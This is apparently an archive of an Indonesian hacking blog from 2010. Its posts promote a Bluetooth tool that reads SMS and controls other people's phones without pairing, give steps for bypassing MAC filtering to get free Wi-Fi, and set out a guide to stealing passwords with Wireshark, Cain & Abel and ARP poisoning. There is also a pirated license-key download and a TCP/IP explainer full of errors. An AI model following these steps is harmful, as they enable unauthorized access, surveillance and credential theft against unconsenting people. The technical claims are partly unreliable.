Kali ini aku membahas tentang aplikasi Super Bluetooth Hack v1.07.jar Java (J2ME), kenapa saya pilih aplikasi tersebut?…?? jawabannya ada beberapa alasan, diataranya :

1. Berbasis J2ME, itu artinya kalo mau melakukan kegiatan hacking aku perlu lagi bawa2 laptop… cukup dengan mengintallnya kedalam mobile phone saja
2. Support diberbagai jenis handphone, yang penting support dengan bahasa java
3. Aplikasinya berukuran kecil.. ringan… dan user friendly
4. No Pairing and No Approvement Code, artinya bahwa Anda bisa melakukan kegiatan hacking ke bluetooth target tanpa harus mengenalkan bluetooth secara resmi… dan tanpa harus meminta approv,ent dari pemilik Bluetooth.

Remote Fitur :
. Dapat membaca semua sms yang terdapat didalam mailbox handphone
. Dapat membaca isi phonephone
. Dapat mengganti2 profile
. Dapat memainkan, membunyikan ring tone ketika handphone dalam kondisi silent
. Dapat menjalankan music player
. Dapat merestart dan mematikan handphone (just : switch off)
. Dapat melakukan “Change Factory Setting”
. Dapat memainkan volume ring tone handphone.

Dimana donload aplikasinya ???? Silahkan donload disini :

jad file : http://download12.getjar.com/downloads/web/pub/21970/Super%20Bluetooth%20Hack%20v1.07.jad

jar file :http://download12.getjar.com/downloads/web/pub/21970/Super%20Bluetooth%20Hack%20v1.07.jar

Compatible with :

Alcatel:
One Touch 557, One Touch 557a, One Touch 735, One Touch 756, One Touch C550, One Touch C552, One Touch C552a, One Touch C750, One Touch S853

Asus:
P525
Audiovox:
SMT 5600
BenQ:
A520, C30, EF51, P50
BenQ-Siemens:
CL71, E61, S81, S88
BlackBerry:
6220, 6230, 6280, 6720, 7100, 7100i, 7130, 7130e, 7210, 7230, 7250, 7280, 7290, 7510, 7520, 7730, 8100, 8130, 8300, 8310, 8320, 8700, 8703e, 8707, 8800, 8820, 8830
CECT:
A1000
Cingular :
Cingular 2125, Cingular BlackJack
Dopod:
Dopod 515, Dopod 557w, Dopod 565, Dopod 575, Dopod 585, Dopod 586w, Dopod 595, Dopod C720W
HP :
iPAQ 510 Mobile Messenger
HTC :
HTC MTeoR, HTC S310, HTC S620, HTC S650, HTC S710, P3400, P3450
Huawei :
U526, U626
i-mate:
i-mate Smartphone2, i-mate SP Jas, i-mate SP3, i-mate SP3i, i-mate SP5, i-mate SP5m, i-mate SPL
I-mobile:
510
Lenovo:
V800
LG:
B2000, B2050, B2070, B2100, B2150, C1100, C1150, C2000, C2500, C2600, C3100, C3300, C3400, CG225, CU400, CU500, F2400, G1600, G1610, G4015, G7100, KE770, KE800, KE820, KE970, KG110, KG195, KG200, KG220, KG225, KG240, KG245, KG290, KG300, KG320, KG800, LG KE500, LG-KE600, LG550, LX550, LX570, M4410, MG100a, MG105, MG220, MX510, P7200, S5200, T5100, TU500, U8210, U8290, U8330, U8500, VX9400, VX9900
LG Electronics:
LG-B2060
Mitac :
Mio 8390, Mio 8860, Mio 8870
Motorola :
A1200, A760, A768, A780, A835, C155, C168, C257, C261, C290, C350, C350M, C380, C385, C390, C450, C550, C650, C975, E1000, E1070, E365, E380, E398, E398B, E398i, E550, E680, E680i, E770, E770-Vodafone, E790, E815, i830, i850, i930, K1, KZRK K1, L2, L6, L6i, L7-Vodafone, L71, Motorola Q, Motorola Q Plus, MPX220, PEBL U6, Razr V3, RAZR V3a, RAZR V3m, Razr V3x, RAZR V3xx, RAZR V3xxv, RAZR V6, RAZR2 V8, RAZR2 V9, RAZR2 V9m, ROKR E1, ROKR E2, ROKR E6, SLVR L7, SLVR L7e, SLVR L7i, SLVR L9, T720, V1050, V1075, V171, V177, V180, V186, V188, V190, V191, V195, V197, V220, V235, V300, V303, V360, V360-Vodafone, V365, V3c, V3i, V3m, V3r, V3t, V3v, V3x-Vodafone, V400, V500, V505, V525, V525M, V535, V545, V547, V550, V551, V555, V557, V600, V600i, V620, V635, V690, V80, V975, V980, V980M, W220, W315, W375, W490, W510, Z3
NEC:
N600
Nokia:
2355, 2610, 2626, 2630, 2650, 2760, 2855i, 2865, 2865i, 3100, 3105, 3110c, 3120, 3125, 3152, 3155, 3155i, 3200, 3220, 3230, 3250, 3300, 3410, 3500, 3510, 3510i, 3530, 3586i, 3587, 3595, 3600, 3620, 3650, 3660, 5070, 5100, 5140, 5140i, 5200, 5300, 5310 XpressMusic, 5500, 6010, 6015, 6020, 6021, 6030, 6060, 6060v, 6061, 6070, 6080, 6085, 6086, 6100, 6101, 6102, 6102i, 6103, 6108, 6111, 6125, 6126, 6131, 6133, 6151, 6155, 6165, 6165i, 6170, 6200, 6220, 6225, 6230, 6230i, 6233, 6234, 6235, 6235i, 6255, 6255i, 6260, 6265, 6265i, 6267, 6270, 6275i, 6280, 6288, 6300, 6310i, 6500c, 6500s, 6555, 6585, 6600, 6610, 6610i, 6620, 6630, 6650, 6651, 6670, 6680, 6681, 6682, 6708, 6800, 6810, 6820, 6822, 7200, 7210, 7250, 7250i, 7260, 7270, 7360, 7370, 7373, 7390, 7500, 7600, 7610, 7650, 7710, 8600 Luna, 8800, 8800 Sirocco, 8910i, 9210, 9290, 9300, 9500, E50, E60, E61, E61i, E62, E65, E70, E90, N-Gage, N-Gage QD, N70, N70-1, N71, N72, N73, N75, N77, N80-1, N90, N91, N92, N93, N93i, N95
O2:
Ice
Orange:
SPV, SPV C100, SPV C500, SPV C550, SPV C600, SPV C700, SPV e100, SPV E200
Panasonic:
A210, SC3, VS2, VS3, VS6, X200P, X400, X400P, X500, X70
Pantech:
PG-1400, PG-1410, PG-C300
Philips:
568, 588, 755, 756, 766, 768, 960, S890, S900
Qtek:
8100, 8500
QTEK:
QTEK 7070, QTEK 8010, QTEK 8020, QTEK 8080, QTEK 8100, QTEK 8300, QTEK 8310, QTEK 8600
RoverPC:
M1
Sagem:
MY 302X, MY 301X, MY 400V, MY 400X, MY 401C, MY 401X, MY 401Z, MY 501C, MY 501X, MY 600v, MY 600x, MY 700X, MY C4-2, MY C5-2, MY C5-2 Vodafone, MY V-55, MY V-56, MY V-65, MY V-75, MY W-7, MY X-4, MY X-5-2T, MY X-6, MY X-7, MY X-8, MY X5-2, MY X5-2M, MY X6-2, MY Z-5, my411X, myX5-2v, Sagem myS-7
Samsung:
A717, i300, i320, i320N, SCH A870, SGH A701, SGH A707, SGH C100, SGH C100G, SGH C130, SGH C140, SGH C160, SGH C170, SGH C200, SGH C207, SGH C207L, SGH C210, SGH C230, SGH C260, SGH C300, SGH C400, SGH C406, SGH C417, SGH D407, SGH D410, SGH D500, SGH D500C, SGH D500E, SGH D510, SGH D520, SGH D600, SGH D600E, SGH D720, SGH D800, SGH D807, SGH D820, SGH D830, SGH D836, SGH D840, SGH D900, SGH D900i, SGH E200, SGH E250, SGH E300, SGH E310, SGH E310C, SGH E315, SGH E316, SGH E330, SGH E330N, SGH E340, SGH E340E, SGH E350, SGH E350E, SGH E360, SGH E370, SGH E376, SGH E390, SGH E420, SGH E490, SGH E500, SGH E530, SGH E568, SGH E570, SGH E600, SGH E620, SGH E630, SGH E630C, SGH E690, SGH E700, SGH E710, SGH E715, SGH E720, SGH E728, SGH E730, SGH E736, SGH E760, SGH E780, SGH E800, SGH E808, SGH E810, SGH E820, SGH E830, SGH E840, SGH E870, SGH E878, SGH E890, SGH E898, SGH E900, SGH G600, SGH i300, SGH I320, SGH I607, SGH J600, SGH L760, SGH M600, SGH P200, SGH P300, SGH P310, SGH P400, SGH P510, SGH P777, SGH P850, SGH P900, SGH P906, SGH P910, SGH P920, SGH S300, SGH S300M, SGH S500, SGH T209, SGH T219, SGH T309, SGH T319, SGH T329, SGH T509, SGH T509S, SGH T519, SGH T609, SGH T619, SGH T629, SGH T729, SGH T809, SGH U600, SGH U700, SGH V200, SGH X100, SGH X100A, SGH X105, SGH X120, SGH X140, SGH X160, SGH X200, SGH X210, SGH X300, SGH X430, SGH X450, SGH X460, SGH X480, SGH X486, SGH X490, SGH X495, SGH X500, SGH X506, SGH X507, SGH X510, SGH X520, SGH X530, SGH X540, SGH X600, SGH X608, SGH X610, SGH X620, SGH X620C, SGH X630, SGH X636, SGH X640, SGH X640C, SGH X648, SGH X650, SGH X660, SGH X670, SGH X680, SGH X686, SGH X700, SGH X820, SGH X830, SGH Z107, SGH Z140, SGH Z170, SGH Z230, SGH Z240, SGH Z300, SGH Z370, SGH Z400, SGH Z400V, SGH Z500, SGH Z510, SGH Z530, SGH Z540, SGH Z560, SGH Z630, SGH Z720, SGH ZV10, SGH ZV40, SGH ZV50, SGH-i607, SPH A580, SPH A640, SPH A660, SPH A680, SPH A740, SPH A900, SPH A900P, SPH A920, SPH A940, SPH A960, SPH M500, SPH M510, SPH M610, SPH M620, Z130, Z150
Sanyo:
S750, SCP-6600
Sharp:
770SH, GX-L15, GX10, GX10i, GX15, GX17, GX20, GX22, GX25, GX29, GX30, GX30i, GXT15, TM100, TM150
Siemens:
A31, A60, A65, A75, AL21, AP75, AX72, AX75, AX76, C55, C60, C62, C65, C65-Vodafone, C66, C72, C75, CF62, CF75, CF76, CX65, CX70, CX75, EF81, M50, M55, M56, M65, M75, MC60, ME75, MT50, S55, S57, S65, S75, SK65, SL42, SL45, SL55, SL65, SL75, ST60, SX1
Sony-Ericsson: D750, D750i, F500i, J200i, J210i, J220i, J230i, J300a, J300i, K200i, K300, K300a, K300i, K310, K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, K810i, K850i, M600i, P1i, P800, P900, P910, P910a, P910i, P990i, S500i, S700, S700i, S710a, T226, T230, T250i, T290a, T290i, T610, T616, T630, T637, T650i, T68, V600, V600i, V630i, W200a, W200i, W300, W300i, W550c, W550i, W580i, W600c, W600i, W610i, W660i, W700i, W710i, W800c, W800i, W810i, W810iv, W830i, W850i, W850iv, W880i, W900i, W910i, W950i, Z1010, Z200, Z300i, Z310i, Z310iv, Z500, Z500a, Z520a, Z520i, Z530i, Z550a, Z550i, Z558i, Z600, Z610i, Z710i, Z800
T-Mobile:
MDA Dash, MDA Mail, SDA, SDA (US name), SDA II, SDA Music
Tatung:
M1
VK Mobile:
VK4000
Vodafone:
v1210, v1240, VDA II, VDA IV

Bagaimana menjalankan aplikasi tersebut ???
1. Copykan saja file *.jad dan *.jar kedalam HandPhone Anda…. terserah saja cara meng-copy nya… bisa pake kabel data… atau mempergunakan bluetooth.
2. Setelah semua file sudah kedalam HandPhone.. disana pasti ada 1 file ekeskuasi dengan nama file “Super Bluetooth Hacking”
3. Pilihlah baccan tersebut… dan klik “OK”
4. Kemudian akan muncul perintah “Install”… pilih dan setujui… tunggu saja sampai selesai….
5. Biasanya jika proses install sudah selesai… aplikasi akan tertanam di menu berbasis java (masing2 hp berbeda penempatan)
6. Eksekusilah file “Super Bluetooth Hcking” dengan membukanya (Open).
7. Tunggu beberapa saat… dan akan muncul beberapa menu diantaranya : Connect, Setting, About dan Exit
8. Pilihlah Connect —> Inquiry Devices. silahkan cari blutooth sasaran.. nikmati isi handphonenya….

Penanggulangan :
. Matikan Bluettoh saat Anda berada di area umum
. Jangan pergunakan HeadSet berbasis Bluetooth.

Semoga bermanfaat……

.thx
lirva32
greetz to :
Echo|Staff, AllMyCrewLab, MyAlmamaterUniv.BudiLuhur, Anak2SMANTILA92, NewBieHacker, Jasakom.

Top 5 Hacker, Black Hat Hacker

2010-01-17T05:14:00.000-08:00

5 orang dibawah ini merupakan top 5 black hat hacker atau lebih dikenal dengan hacker yang bandel, jail, dan nakal!! akan tetapi jangan ragukan lagi kemampuan mereka!!

1. JONATHAN JAMES

Siapa sih orang ini? Oke, James adalah orang Amerika, saat baru beumur 16 tahun dia di kirim ke penjara karena kelakuannya di dunia maya. Situs departemen pertahanan Amerika dibobol oleh James dan James hanya mengatakan hal itu adalah tantangan baginya dan merupakan suatu kesenangan tersendiri. Hebat!!
NASA pun sempat menjadi target keisengan James, James mencuri software NASA yang diperkirakan seharga $1,7 Juta Dollar AS, sampai - sampai NASA dipaksa untuk mematikan server dan sistemnya. Karena kelakuannya itu James tidak boleh memegang komputer selama 10 tahun. Akan tetapi sekarang James sudah berada di jalan yang benar dan membuat sebuah perusahaan keamanan di bidang komputer. Hebat!!
2. ADRIAN LAMO

Adrian Lamo membobol New York Times untuk mendapatkan info personal dan beberapa security number dan membobol Microsoft. Akhirnya Adrian Lamo didenda $65.000 dollar US. Akan tetapi saat ini Adrian Lamo sudah berjalan di jalan yang semestinya. Adrian Lamo saat ini menjadi pembicara di beberapa acara seminar. Keren!!

3. KEVIN MITNICK
Ini adalah beberapa sepak terjang Kevin Mitnick

Menggunakan Los Angeles Bus Transfer System untuk mendapatkan tumpangan gratis.
Mengelabui FBI
Hacking ke dalam DEC System ( Digital Equipment Corporation )
Mendapatkan Administrator position dalam satu komputer IBM agar menang judi.
Hacking Motorola, Nec, Nokia, Sun Microsystems dan Fujitsu Siemens Systems
Dan masih banyak lagi . . .

Seorang white hat hacker bernama Tsutomu Shimomura ( Tsutomu merupakan top 5 white hat hacker ) di hack komputer systemnya, dan terjadilah perang luar biasa. Kevin Mitnick terlacak dan tertangkap oleh FBI dengan bantuan Tsutomu Shimomura yang melacak ( tracking ) lewat jaringan HP yang dibawa oleh Mitnick saat itu. Akan tetapi Mitnick sekarang sudah bertobat dan menjadi penulis buku, konsultan security dan pembicara berbagai seminar.
4. KEVIN POULSEN
Juga dikenal dengan Dark Dante, Dark Dante ngehack database FBI. Selain itu Dante juga mengehack seluruh lines phone station. Karena memang kemahiran dia adalah mengehack lewat phone lines. Saat ini Dark Dante menjadi senior di Wired News dan berhasil menangkap 744 penawaran sex melalui profile MySpace. Selamat Berjuang !!!
5. ROBERT TAPPAN MORIS
Robert Tappan Moris adalah orang yang pertama kali membuat Worm, yang dinamai Morris Worm. Melalui Internet dia menyebar wormnya yang mengakibatkan sekitar 6000 komputer menjadi down. Akhirnya Robert dipenjarakan rumah selama 3 tahun dan didenda $10.500 dollars. Sekarang Robert bekerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory.
HACKER LEGENDARIS

Bernama KARL KOCH berasal dari hannover Jerman yang menamai komputernya FUCKUP (First Universal Cybernetic-Kinetic Ultra-Micro Programmer), Karl melakukan beberapa keberhasilan dalam mengehack pada kurun waktu 1985-1988. Karl juga seorang cocaine addict!!
Dia berhasil membobol beberapa sistem militer AS dan mengehack sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hack’annya dijual ke KGB (Agen Rahasia Uni Soviet) dia ditemukan tewas pada tahun 1988, menurut info Karl membakar tubuhnya sendiri, namun siapa tahu, ini konspirasi tingkat tinggi antara US dan Soviet pada perang dingin!!!

Download Deep Freeze v6.51.020.2725 + License Key

2010-01-17T05:12:00.000-08:00

Deep Freeze, merupakan salah satu software yang mampu membekukan partisi hardisk kita.
Untuk sebagian orang, Deep Freeze sangatlah bermanfaat. Karena Deep Freeze mampu menjaga utuh data pada partisi hardisk yang difreeze. Cukup di restart maka data anda akan terjaga kembali.
Download : Download Deep Freeze v6.51.020.2725 + License Key

TCP/IP protocols

2010-01-17T05:11:00.000-08:00

Networking is divided into variety of protocols like

SMPT -: simple mail transfer protocol
UDP -: user datagram protocol
TCP/IP -: Transmission control protocol/internet protocol
FTP -: File transfer protocol
GTP -: Gateway discover protocol
HTTP -: Hyper text transfer protocol

Amongst all these, TCP/IP protocol are highly used protocols. There are basically seven OSI (Open systems interconnection) layers, where the TCP/IP routes under transport layer which is the forth layer in OSI system model.

TCP/IP is a set of communication protocol used for running internet and other similar networks. These are only the first protocols defined in these standards. Today’s IP addresses are completely based on these set of protocols. The internet protocol like other protocols are a set of various layers built in together to run a particular application. The internet protocol set came out from the work done by (DARPA) Defense Advanced Research Project Agency in eary 1970’s. It was soon developed after building up the set for ARPNET. The TCP is at the central and the core of networking whereas IP as a job of handling the lower-level transmission of computer networks. Besides networking it also handles the e-mail and file-transfer services.
The TCP/IP is basically bound together because, if incase the IP loses some packets at the time of packet transmission the TCP finds these errors and detects them to recollect the respective packets and make its working effective and efficient. These days IP’s are used which are known as IPv4 i.e IP version 4 consisting of 16 bits, however no sooner IPv6 are going to be launched. There a IP conflicts being committed in public networks hence there is an introduction of IPv6. The detailed story of LAN connections with the help of TCP/IP will be shown in my next article.

Cara Membobol MAC Address Filtering

2010-01-17T05:08:00.000-08:00

Membobol MAC Address Filtering:

Jalankan Live CD Distro Linux BackTrack2, masukkan username “root”, lalu masukkan password “toor”.
Setelah muncul prompt, ketikkan “startx”.
Setelah muncul desktop environment KDE, klik tombol “K” (di pojok kiri bawah). Pilih BackTrack  Radio Network Analysis -> 80211  Analyser  Kismet.
Lalu muncul window “Select Network Device”, pilih “wifi0″. Klik “OK”.
Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan, maka akan muncul pesan “ALERT: Suspicious client 00:02:6F:37:08:20 - probing networks but never participating.”
Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan “Found IP 192.168.2.1 for slamet::00:0E:2E:C2:2C:0E via ARP”.

Keterangan:
slamet -> nama SSID
Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni airodump.
Keterangan:
Bila kita menggunakan program scanning yang lain, biasanya program pertama akan membuat driver wireless kita “rusak”. Untuk dapat digunakan pada program yang kedua, kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).

Cara memperbaiki driver, ketik:

#airmon-ng -> untuk mengecek interface yang tersedia.
Matikan driver “ath0″ dan “ath1″ dengan mengetik:
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila interface ath1 ada

Mengaktifkan driver yang baru, ketik:

#airmon-ng start wifi0

Bila diketikkan perintah #iwconfig , maka muncul informasi “ath0″ sudah aktif dengan Mode=Monitor.

Berikutnya, ketik #airodump-ng ath0

Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet.

Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.

Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan ubah MAC-Addressnya.
Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh……..

By Destana Dwi Maulidani & Wilis

Sumber : my-wifi.blogspot.com

Trik Mendownload Super Cepat

2010-01-17T05:06:00.000-08:00

Terkadang mungkin anda bingung dengan kecepatan download anda yang sangat lambat. Seringkali anda dibuat jengkel.
Mungkin tutorial ini bisa sedikit membantu anda :
Pertama :
Download 3 tool di bawah ini :

Kemudian :

Instal terlebih dahulu Internet Download Manager Pack 5.17
Setelah IDM terisntal, kemudian klik 2x Tool U94. ( gambar a. )
Klik 2x TCPZ klik patch, naikan menjadi 2000 . ( gambar b. )
dan apply klik TCP. ( gambar c. )
Klik icon IDM di start=>all programs,
Klik option => connect => ganti connection type menjadi LAN 10Mb => Defaul max number ganti menjadi 16, kemudian OK. ( gambar d )
NB : SEBELUM INSTAL SEMUA TOLL TERSEBUT JANGAN BROWSING DULU , SUPAYA HASILNYA MAX.
ATAU RESTART FIREFOX, INTERNET EXPLOR, ATAU OPERA ANDA.

Tutorial Antena Kaleng dan Antena Wajan Bolic

2010-01-17T04:22:00.000-08:00

Berikut adalah cara - cara membuat antena dengan wajan bolic untuk mencari singnal wirelles.

Antenna kaleng mulai saya buat pada akhir tahun 2005… pengalaman menarik, lucu dan terkesan bodoh waktu itu ketika dengan PDnya saya menggunakan kabel antena Televisi dan port untuk Handy Talky yang harganya 3000 an… al hasil, tidak bisa menangkap sinyal Hotspot dari kampus berjarak kurang lebih 500 meter… Akhirnya coba lagi terus, mencari komponen yang sesuai dengan tutorial yang saya dapatkan dari anak2 laboran kampus, sampai akhirnya bisa konek dan berinternet ria dari jarak sekitar 600 meter dari akses point dengan sinyal “good”.
Setelah itu, eh ntah dari mana temen2 kok jadi banyak yang tahu, baik yang kenal ato ga kenal bahkan ada yang mendatangi kost untuk sekedar tanya2 ato minta dibuatin antena kaleng. Ya, dengan enteng saya bilang “Saya gak mau buatin antena kaleng, tapi kamu mau buat akan saya bantu”, seperti itu kira2… . Saya pun cuma bisa ketawa-ketiwi ketika lihat temen2 ada yang buat antena, kawatnya dibentuk macem2.. wew… yah, akhirnya sih mereka bisa bua sendiri2…
Tutorial antena kaleng ini dibuat sama temen saya, Hari Sudibyo, kakak angkatan yang sekarang ada di Batam jadi juragan kue pukis… dulu dia buatnya mandiri, saya cuma mengantarkan di beli bahan yang diperlukan di toko elektronik. Barangnya nyarinya cukup sulit, ya mungkin hanya orang2 tertentu aja yang bisa nyari tu barang… yang udah tahu toko2 elektronik maksudnya..
Download Tutorial Antena Kaleng
Antena Wajan Bolic dibuat oleh ketua organisasi komputer club (AMCC), Arshandy… hanya saja karena peralatan yang minim, akhirnya pinjam deh peralatan untuk robotika, kebetulan saya ikut robotika waktu itu dan mendapatkan full akses barang2 untuk robotika, terutama… BOR… . Setelah semua selesai, ternyata masalah tetep aja datang…USB Wireless Card tidak terdeteksi… yah…akhirnya ketemu juga masalahnya pada KABEL UTP, tahanan kabel UTP terlalu besar sehingga power loss pun ikut besar… maklum, kabel UTP murahan… Akhirnya masalah bisa kelar setelah kabel UTP diganti dengan kabel UTP yang LUAR BIASA (harga 3500 permeter)… Al hasil, penguatan sinyal dengan antena Wajan Bolic jauh lebih besar ketimbang dengan antena Kaleng…
Download Tutorial Antenna Wajan Bolic
Antena Helikal… saya hanya terlibat mengantarkan temen yang mau buat antena ini ke Beringharjo, Malioboro beli plat kuningan yang harganya lumayan mahal, 2x makan … dan juga memberikan peralatan untuk buat antena itu… katanya sih hasilnya bagus… tutorial nya saya ga punya… jadi ya maap-maap aja deh…
Thats all, saya sih penginnya membuat konsep yang berbeda berdasarkan teori dari pembuatan wajan bolic dan antena kaleng, misalnya menggunakan reflektor pake antena televisi yang bulet ato pake bola mainan dari plastik yang dilapisi aluminium foil sebagai reflektor tapi ya… belum kesampaian…

Cracking WEP In Under 4 Minutes

2010-01-17T04:18:00.000-08:00

here cracking WEP hanya empat menit.

Cracking WEP In Under 4 Minutes - Click here for the funniest movie of the week

semoga bisa mengatasi kejenuhan.

BackTrack 4 Pre Final Hard Disk Install !

2010-01-17T04:15:00.000-08:00

here tutorial video untuk instal backtrack 4 pre final,

BackTrack 4 Pre Final Hard Disk Install ! - Funny video clips are a click away

semoga bermanfaat,sesama newbie...

Cara Mengenal wireless hacking dan segala triknya

2010-01-17T04:08:00.000-08:00

Wi-Fi (Wireless Fidelity)

Wi-Fi (Wireless Fidelity) adalah koneksi tanpa kabel seperti handphone dengan mempergunakan teknologi radio sehingga pemakainya dapat mentransfer data dengan cepat.
Wi-Fi tidak hanya dapat digunakan untuk mengakses internet, Wi-Fi juga dapat digunakan untuk membuat jaringan tanpa kabel di perusahaan. Karena itu banyak orang mengasosiasikan Wi-Fi dengan “Kebebasan” karena teknologi Wi-Fi memberikan kebebasan kepada pemakainya untuk mengakses internet atau mentransfer data dari ruang meeting, kamar hotel, kampus, dan café-café yang bertanda “Wi-Fi Hot Spot”.
Awalnya Wi-Fi ditujukan untuk pengunaan perangkat nirkabel dan Jaringan Area Lokal (LAN), namun saat ini lebih banyak digunakan untuk mengakses internet. Hal ini memungkinan seseorang dengan komputer dengan kartu nirkabel (wireless card) atau personal digital assistant (PDA) untuk terhubung dengan internet dengan menggunakan titik akses (atau dikenal dengan hotspot) terdekat.
spesifikasi

Wi-Fi dirancang berdasarkan spesifikasi IEEE 802.11. Sekarang ini ada empat variasi dari 802.11, yaitu: 802.11a, 802.11b, 802.11g, and 802.11n. Spesifikasi b merupakan produk pertama Wi-Fi. Variasi g dan n merupakan salah satu produk yang memiliki penjualan terbanyak pada 2005.
Spesifikasi Wi-Fi
Spesifikasi Kecepatan Frekuensi
Band Cocok
dengan
802.11b 11 Mb/s 2.4 GHz B
802.11a 54 Mb/s 5 GHz A
802.11g 54 Mb/s 2.4 GHz b, g
802.11n 100 Mb/s 2.4 GHz b, g, n

Secara teknis operasional, Wi-Fi merupakan salah satu varian teknologi komunikasi dan informasi yang bekerja pada jaringan dan perangkat WLAN (wireless local area network). Dengan kata lain, Wi-Fi adalah sertifikasi merek dagang yang diberikan pabrikan kepada perangkat telekomunikasi (internet) yang bekerja di jaringan WLAN dan sudah memenuhi kualitas kapasitas interoperasi yang dipersyaratkan.

Teknologi internet berbasis Wi-Fi dibuat dan dikembangkan sekelompok insinyur Amerika Serikat yang bekerja pada Institute of Electrical and Electronis Engineers (IEEE) berdasarkan standar teknis perangkat bernomor 802.11b, 802.11a dan 802.16. Perangkat Wi-Fi sebenarnya tidak hanya mampu bekerja di jaringan WLAN, tetapi juga di jaringan Wireless Metropolitan Area Network (WMAN).

Karena perangkat dengan standar teknis 802.11b diperuntukkan bagi perangkat WLAN yang digunakan di frekuensi 2,4 GHz atau yang lazim disebut frekuensi ISM (Industrial, Scientific dan edical). Sedang untuk perangkat yang berstandar teknis 802.11a dan 802.16 diperuntukkan bagi perangkat WMAN atau juga disebut Wi-Max, yang bekerja di sekitar pita frekuensi 5 GHz.

Kelebihan Wi-fi

Tingginya animo masyarakat -khususnya di kalangan komunitas Internet- menggunakan teknologi Wi-Fi dikarenakan paling tidak dua faktor.

1) kemudahan akses. Artinya, para pengguna dalam satu area dapat mengakses Internet secara bersamaan tanpa perlu direpotkan dengan kabel.

2) pengguna yang ingin melakukan surfing atau browsing berita dan informasi di Internet, cukup membawa PDA (pocket digital assistance) atau laptop berkemampuan Wi-Fi ke tempat dimana terdapat access point atau hotspot.

Menjamurnya hotspot di tempat-tempat tersebut -yang dibangun oleh operator telekomunikasi, penyedia jasa Internet bahkan orang perorangan- dipicu faktor kedua, yakni karena biaya pembangunannya yang relatif murah atau hanya berkisar 300 dollar Amerika Serikat. Juga salah satu kelebihan dari Wi-Fi adalah kecepatannya yang beberapa kali lebih cepat dari modem kabel yang tercepat. Jadi pemakai Wi-Fi tidak lagi harus berada di dalam ruang kantor untuk bekerja

Wi-fi Hardware

Hardware wi-fi yang ada di pasaran saat ini ada berupa

Wi-fi dalam bentuk PCI Wi-fi dalam bentuk USB

Ada 2 mode akses koneksi Wi-fi, yaitu

Ad-Hoc

Mode koneksi ini adalah mode dimana beberapa komputer terhubung secara langsung, atau lebih dikenal dengan istilah Peer-to-Peer. Keuntungannya, lebih murah dan praktis bila yang terkoneksi hanya 2 atau 3 komputer, tanpa harus membeli access point

Infrastruktur

Menggunakan Access Point yang berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan banyak Client dapat saling terhubung melalui jaringan (Network).

Kelemahan pada wifi

Mudahnya dihacking oleh para hacer untuk mencuri password pengguna wi-fi

Cara adalah sebagai berikut:

Pertama kita harus mengetahui perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.

* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing

* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya

* Bisa mencuri semua jenis login password yang melalui server HTTP

* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan

* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS

* Semua programnya free

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)

* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban

* Komputer Hacker

* Server

Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.

2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

* Jalankan program wireshark

* Tekan tombol Ctrl+k (klik capture lalu option)

* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on

* Klik tombol start

* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selamaanda menekan tombol start

* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich

* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )

* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
